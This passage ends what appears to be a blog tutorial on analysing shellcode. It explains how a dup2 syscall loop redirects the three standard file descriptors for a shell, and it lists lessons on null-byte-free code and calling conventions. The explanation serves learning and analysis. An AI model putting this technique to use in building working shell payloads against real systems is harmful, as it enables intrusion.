Before the loop takes place, we have rsi = 0x0000000000000002. The instructions <+6> and <+7> respectively decrement the register and jump to the label in case of a negative value, in other words, rsi will take the values 2, 1, 0 throughout the loop. These are respectively the symbolic constants STDERR, STDOUT, and STDIN. Since rsi contains the second parameter to any API, this loop will have the syscall invoked with the three constants. The first three instructions instantiate the value of RAX for the syscall.

Now, 0x5a in decimal is 90, corresponding to the syscall:

90      AUE_DUP2        ALL     { int sys_dup2(u_int from, u_int to); }

and we already know what we have to do: man 2 dup2.

Chiefly, this call duplicates an existing object descriptor to another. In this case, this implements the redirection.

Shell execution

We already discussed this code in Come taste some shellcode....

Conclusions

This lesson has been very productive, in fact we obtained:

  1. learning how to produce a null-byte-free code
  2. reviewed some techniques to set the syscall numbers
  3. learned about some types' sizes
  4. got acquainted (hopefully!) with AMD calling conventions
  5. learned a methodology to investigate syscalls
  6. learned how to pass pointers to routines and about the stack.

I must admit that the usage of lldb for complex projects may not be sufficient. I am making a point of approaching larger projects with two disassemblers side by side.

Did you find this article valuable?

Support Gabriele Biondo by becoming a sponsor. Any amount is appreciated!